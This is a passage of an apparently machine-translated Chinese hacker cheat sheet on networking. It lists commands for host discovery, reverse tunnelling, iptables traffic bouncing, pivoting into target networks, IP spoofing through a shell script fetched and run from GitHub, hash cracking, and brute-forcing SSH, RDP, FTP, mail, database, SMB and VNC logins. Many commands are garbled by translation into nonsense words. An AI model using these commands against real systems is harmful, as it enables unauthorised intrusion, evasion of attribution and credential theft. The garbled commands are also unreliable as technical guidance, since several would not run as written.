黑客在建立网络时使用各种技巧来提高匿名性、安全性和效率。以下是一些基本的网络配置技巧。
3. 网络
3.1发现主机
#\\# 本地网络上的ARP 分发计算机
nmap -r -sn -PR 192.168.0.1/24
\\## ICMP 发现本地网络上的计算机
NET=\’10.11.0\’ \\# 检测10.11.0.1-10.11.0.254
序列1 254 | \’$7;}\’ | 排序-uV -k1,1
3.2 tcp转储
\\## 监控所有新的TCP 连接
tcpdump -np \’tcp\\[tcpflags\\]==tcp-syn\’\\## 在每个新的SSH 连接上播放\\*bing\\* 噪音
运行tcpdump -nplq \’tcp\\[13\\]==2 和dst 端口22\’ | echo \’${x}\’。
\\## ASCII 输出(对于所有大数据包;如果未使用TCP 选项,则更改为40)。
tcpdump -npAq -s0 \’tcp 和(ip\\[2:2\\] 60)\’
3.3隧道与转发
\\## 连接到SSL(使用socat)
socat stdio openssl\\-connect:smtp.gmail.com:465
\\## 连接到SSL(使用openssl)
openssl s\\_client \\-connect smtp.gmail.com:465
\\## 将TCP 桥接到SSL
socat TCP-LISTEN:25,reuseaddr,fork openssl-connect:smtp.gmail.com:465
3.3.1 原始TCP 反向端口
使用segfault.net[1](免费):
\\# 请求随机公共TCP 端口:
卡尔SF/港口
echo \’您的公共IP:PORT是$(cat /config/self/reverse\\_ip):$(cat /config/self/reverse\\_port)\’
nc -vnlp $(cat /config/self/reverse\\_port)
使用bore.pub[2](免费)。
\\# 将随机公共TCP 端口转发到localhost:31337
钻孔本地31337 –to bore.pub
使用serveo.net[3](免费):
\\# 将随机公共TCP 端口转发到localhost:31337
ssh -R 0:localhost:31337serveo.net
另请参阅remote.moe[4](免费)将原始TCP 从目标转发到工作站,或ngrok[5](付费订阅)以转发原始公共TCP 端口。
其他免费服务仅限于HTTPS(而非原始TCP)传输。以下是一些提示,展示如何通过HTTPS 传输原始TCP(使用Websockets)。
3.3.2 HTTPS反向隧道
在您的服务器上使用以下三种HTTPS 隧道服务之一:
\\### 使用反向HTTPS 隧道将公共HTTPS 请求转发到此服务器上的端口8080:
ssh -R80:0:8080 -o StrictHostKeyChecking=accept\\-new nokey@localhost.run
\\### 或使用remote.moe
ssh -R80:0:8080 -o StrictHostKeyChecking=accept\\-new nokey@remote.moe
\\### 或使用cloudflared
卷曲-fL -o cloudflare https://github.com/cloudflare/cloudflared/releases/latest/download/cloudflared-linux-amd64
chmod 755 云flare
cloudflare 隧道–url http://localhost:8080 –no\\-autoupdate
这两个服务都会生成一个新的临时HTTPS URL 供您使用。
接下来,使用websocat[6] 或Gost 在两端的HTTPS URL 上建立原始TCP 隧道。 [7]
A. 通过HTTPS 的简单STDIN/STDOUT 管道:
\\### 在服务器上将WebSocket 转换为原始TCP:
websocat \\-s 8080
\\### 将stdin/stdout 转发到远程目标上的WebSocket:
websocat wss://HTTPS-URL
B. 通过HTTPS 传输原始TCP。
\\### 在服务器: 上,Gost 将任何HTTP-Websocket 请求转换为TCP Socks5 request:
gost -L mws: //:8080
将端口2222 转发到服务器上的端口22。
\\### 在工作站: 上
gost -L tcp://:2222/127.0.0.1:22 -F \’mwss://HTTPS-URL:443\’\\### 测试连接(连接到服务器上的localhost:22)
数控越南127.0.0.1 2222
或者,使用服务器作为Socks-Proxy EXIT 节点(例如,通过服务器访问服务器网络中的任何主机或访问Internet(使用上述HTTPS 反向隧道))。
\\### 在工作站: 上
gost -L :1080 -F \’mwss://HTTPS-URL:443\’\\### 测试socks-proxy:
卷曲-xocks5h://0 ipinfo.io
详细信息:https://github.com/twelvesec/port-forwarding 和通过Cloudflare[8] 和Awesome Tunneling[9] 到任何TCP 服务的隧道。
3.3.3 使用iptables 反弹流量
使用主机192.168.0.100作为跳转主机。将连接从任意位置转发到192.168.0.100:53,然后转发到1.2.3.4:443。
端口\\=53
DSTIP\\=1.2.3.4
D端口\\=443
echo 1 /proc/sys/net/ipv4/ip\\_forward
iptables -t mangle -C PREROUTING -j CONNMARK –restore-mark iptables -t mangle -I PREROUTING -j CONNMARK –restore-mark
iptables -t mangle -A PREROUTING -p tcp –dport ${FPORT:} -m addrtype –dst-type LOCAL -j MARK –set-mark 1188
iptables -t nat -I PREROUTING -p tcp -m mark –mark 1188 -j DNAT –to ${DSTIP:}:${DPORT:}
iptables -I 转发-m 标记–mark 1188 -j 接受
iptables -t nat -I 后路由-m mark –mark 1188 -j 伪装
iptables -t nat -I POSTROUTING -m mark –mark 1188 -j CONNMARK –save-mark
使用此技巧从防火墙网络深处访问gsocket-relay-network(或TOR)。
\\# 部署到只能到达192.168.0.100的目标
GS\\_HOST=192.168.0.100 GS\\_PORT=53 ./deploy.sh
\\#访问目标
GS\\_HOST=1.2.3.4: GS\\_PORT=443 gs-netcat -i -s .
3.3.4 Ghsot IP/IP 欺骗
对于目标网络中的主机很有用。该工具重新配置SHELL(不跟踪)。从该SHELL(nmap、cme等)启动的程序将使用假IP。所有攻击均来自不存在的主机。
来源(curl -fsSL https://github.com/hackerschoice/thc-tips-tricks-hacks-cheat-sheet/raw/master/tools/ghostip.sh)
这也可以与以下方式结合使用:
段错误ROOT 服务器[10]
:将ROOT服务器连接到目标网络,并使用目标网络中的Ghost IP。
QEMU 隧道[11]
:与上面相同,但安全性较差。
3.4通过 Socks Proxy 使用任何工具
使用gsocket 创建从目标到工作站的隧道。
在目标网络上:
#\\# 在目标网络上创建SOCKS 代理。
#\\# 使用gs-netcat,但ssh -D 也可以工作。
gs-netcat -l -S
在工作站上:
#\\# 创建到目标network:的gsocket隧道
GS-netcat-p 1080
使用代理链。
\\## 使用ProxyChain访问目标网络:上的任意主机
echo -e \’\\[ProxyList\\]\\\\nsocks5 127.0.0.1 1080\’ pc.conf
proxychain -f pc.conf -qcurl ipinfo.io
\\## 扫描192.168.1.1 上的路由器
代理链-f pc.conf -q nmap -n -Pn -sV -F –open 192.168.1.1
\\## 并行启动10 个nmap:
seq 1 254 | xargs -P10 -I{} proxychain -f pc.conf -q nmap -n -Pn -sV -F –open 192.168.1.{}
使用GrafTCP:
\\## 使用graftcp访问目标网络:上的任意主机
(graftcp-local -select\\_proxy\\_mode only\\_socks5 )
嫁接cp 卷曲ipinfo.io
raftcp ssh root@192.168.1.1
raftcp nmap -n -Pn -sV -F –open 19.168.1.1
3.5 查找您的公共 IP 地址
卷曲-s wtfismyip.com/json |
卷曲ifconfig.me
dig +short myip.opendns.com @resolver1.opendns.com
主机myip.opendns.comsolver1.opendns.com
获取有关任何IP 地址的地理位置信息。
卡尔https://ipinfo.io/8.8.8.8 |
卷曲http://ip-api.com/8.8.8.8
卷曲https://cli.fyi/8.8.8.8
通过IP地址获取ASN信息。
asn() {
\\[\\[ -n $1 \\]\\] { echo -e \’begin\\\\nverbose\\\\n${1}\\\\nend\’|netcat whois.cymru.com 43| }
(echo -e \’begin\\\\nverbose\’;cat -;echo end)|netcat whois.cymru.com 43|tail -n +2
}
asn 1.1.1.1 \\# 单个IP查找
cat IPS.txt asn \\# 批量搜索
检查TOR 是否正常工作。
卷曲-x sock5h: //localhost:9050 -s https://check.torproject.org/api/ip
\\### 结果应该是{\’IsTor\’:true.
3.6检查世界各地的可达性
**https://ping.pe/** 的好心人可以运行ping/traceroute/mtr/dig/port 来检查世界各地的主机,检查TCP 端口,解析域名等。Masu。
要检查(当前)主机的互联网连接,请使用OONI 探针[12]。
奥尼探测器运行我
网站由ooniprobe运营
奥尼探针列表
奥尼探针列表1
3.7检查/扫描 IP 上的开放端口
**Censys[13] 或Shodan[14]** 端口查找服务:
卷曲https://internetdb.shodan.io/1.1.1.1
快速(-F)漏洞扫描
\\# 收集版本
nmap \\-sCV \\-F \\-Pn \\–min\\-rate 10000 scanme.nmap.org
\\# 气球
nmap \\-A \\-F \\-Pn \\–min\\-rate 10000 \\–script vulners.nse \\–script\\-timeout\\=5s scanme.nmap.org
使用bash:
超时5 bash -c \’/dev/tcp/1.2.3.4/31337\’ echo 打开|| echo 关闭
3.8破解密码哈希
NTLM2 密码[15]
破解NTLM 密码(搜索)
wpa-sec[16]
破解WPA PSK 密码(搜索)
HashCat 对于其他用途来说也是一个可靠的工具。
hashcat my\\-hash /usr/share/wordlists/rockyou.txt
或者在GPU 上使用10 天的7-16 字符哈希掩码:[17]
卷曲-fsSL https://github.com/sean-t-smith/Extreme\\_Breach\\_Masks/raw/main/10%2010-days/10-days\\_7-16.hcmask -o 10-days\\_7-16.hcmask
\\# -d2==仅使用GPU #2(设备#2)
\\# -O==速度提高50%,但密码长度限制为=15
\\# -w1==低工作负载(-w3==高)
好-n 19 hashcat -o crashed.txt my-hash.txt -w1 -a3 10天\\_7-16.hcmask -O -d2
请阅读常见问题解答[18]。
6 6 6 请注意,散列速度很慢。即使是7 到16 个字符的1 分钟哈希掩码[19] 在8xRTX4090 集群上也需要很多天才能完成。
使用Vast.ai[20] 租用GPU 集群并使用dizcza/docker-hashcat[21](详细信息请参阅[22])。
否则,请使用Crackstation[23]、shuck.sh[24]、ColabCat/cloud[25]/**Cloudtopolis[26],或破解您自己的AWS[27]** 实例。
用户名和密码列表:
/usr/share/nmap/nselib/data
/usr/share/wordlists/seclists/密码
https://github.com/berzerk0/Probable-Wordlists
-THC 收藏夹
https://github.com/danielmiessler/SecLists
https://wordlists.assetnote.io
https://weakpass.com
https://crackstation.net/
配置用户名/密码列表和目标主机。
ULIST=\’/usr/share/wordlists/brutespray/mysql/user\’
PLIST=\’/usr/share/wordlists/seclists/Passwords/500-worst-passwords.txt\’
T=\’192.168.0.1\’
有用的Nmap 参数:
\\–script-args userdb=\’${ULIST}\’,passdb=\’${PLIST}\’,brute.firstOnly
有用的Ncrack 参数:
\\-U \’${ULIST}\’
\\-P \’${PLIST}\’
有用的Hydra 参数:
\\-t4 \\# 限制为4 个任务
\\-l root \\# 设置用户名
\\-V \\# 显示每次登录/密码尝试
\\-s 31337 \\# 设置端口
\\-S \\# 使用SSL
\\-f \\# 第一次有效登录后退出
## SSH
nmap -p 22 –script ssh-brute –script-args ssh-brute.timeout=4s \” T \’ n c r a c k P \’ T\’ ncrack -P \’ T\’ncrackP\'{PLIST}\” –user root \” ssh://T \’ Hydra P \’ {T}\’ Hydra -P \’ T\’ Hydra P\'{PLIST}\” -l root “ssh://$T”
\\## 远程桌面协议/RDP
ncrack -P \’${PLIST}\’ –用户root -p3389 \’${T}\’
Hydra -P \’${PLIST}\’ -l root \’rdp://$T\’
\\## FTP
Hydra -P \’${PLIST}\’ -l 用户\’ftp://$T\’
## IMAP(电子邮件)
nmap -p 143,993 –script imap-brute“$T”
\\## POP3(电子邮件)
nmap -p110,995 –script Pop3-brute \’$T\’
\\##MySQL
nmap -p3306 –script mysql-brute \’$T\’
\\## PostgreSQL
nmap -p5432 –script pgsql-brute \’$T\’
\\## SMB(Windows)
nmap –script smb-brute \’$T\’
\\## 远程登录
nmap -p23 –script telnet-brute –script-args telnet-brute.timeout=8s \’$T\’
\\## VNC
nmap -p5900 –script vnc-brute \’$T\’
ncrack -P \’${PLIST}\’ –用户root \’vnc://$T\’
Hydra -P \’${PLIST}\’ \’vnc://$T\’
美杜莎-P \’${PLIST}\’ -u root -M vnc -h \’$T\’
\\## VNC(使用metasploit)
无国界医生控制台
使用辅助/扫描仪/vnc/vnc\\_login
设置rhosts 192.168.0.1
设置pass\\_file /usr/share/wordlists/seclists/Passwords/500\\-worst\\-passwords.txt
跑步
\\## HTML 基本身份验证
echo admin user.txt \\# 请仅尝试一个用户名
echo -e \’blah\\\\naaddd\\\\nfoobar\’ pass.txt \\# 添加一些密码。 “aadd”有效。
nmap -p80 –script http-brute –script-args \\\\
http-brute.hostname=pentesteracademylab.appspot.com,http-brute.path=/lab/webapp/basicauth,userdb=user.txt,passdb=pass.txt,http-brute.method=POST,brute.firstOnly \\\\
Penteterra 学院mylab.appspot.com
免责声明
本文为技术分享文章,仅供教育交流之用,不构成法律或专业建议。读者使用本文需自行承担风险和责任。作者和组织对因使用本文而产生的任何损失或损害不承担任何责任。
本文严格禁止提供、讨论或鼓励网络安全违规行为。请遵守法律法规,从事合法的技术共享活动。
网安黑客学习资料包
根据最新的Kali描述,一步步分析黑客攻击和防御。适合各个级别的粉丝。如果我们能够提供实际的帮助,让您能够通过新鲜生动、易于理解且幽默的解释轻松享受学习的乐趣。
学习资料工具包
盒底丰富资源,全面深入介绍网络安全基础理论,包括逆向工程、八层网络防御、汇编语言、白帽网络安全、密码学、网络安全协议、等等。基础理论与主流工具的应用实践。帮助读者了解各种主流工具背后的实现机制。
面试题资料
我们的专用频道收集了京东、360、天融信等公司的试题。大工厂的入口就在拐角处!
由于篇幅有限,仅展示部分信息。如果您需要,可以扫描下面的卡片获取。
以上关于#高级黑客技术的相关内容摘自互联网,仅供参考。相关信息请参见官方公告。
原创文章,作者:CSDN,如若转载,请注明出处:https://www.sudun.com/ask/92845.html